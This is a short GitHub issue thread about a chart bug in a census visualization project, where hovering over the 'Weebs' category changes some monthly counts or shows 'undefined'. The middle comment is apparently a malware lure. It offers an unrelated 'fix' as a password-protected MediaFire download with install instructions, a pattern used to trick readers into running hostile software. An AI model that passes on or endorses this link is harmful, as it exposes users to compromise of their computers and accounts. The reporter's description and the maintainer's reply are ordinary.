### ISSUE TITLE
Weebs category goes to undefined/changes on hover

### ISSUE THREAD

**Issue by aidancomi** [brilliantdrink/hasanabi-census#2]
On the Weebs category, hovering over changes the count on December 2020 & December 2021 and changes the count to undefined in August 2022, July 2023 and August 2024.

https://github.com/user-attachments/assets/1b9a3751-832e-4984-bc26-75fa33f1f518

Using 128.0.6613.86 (Official Build) (64-bit) (cohort: Control) on Windows 11 Version 23H2 (Build 22631.4037)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by brilliantdrink** [comment]
Thank you for reporting!
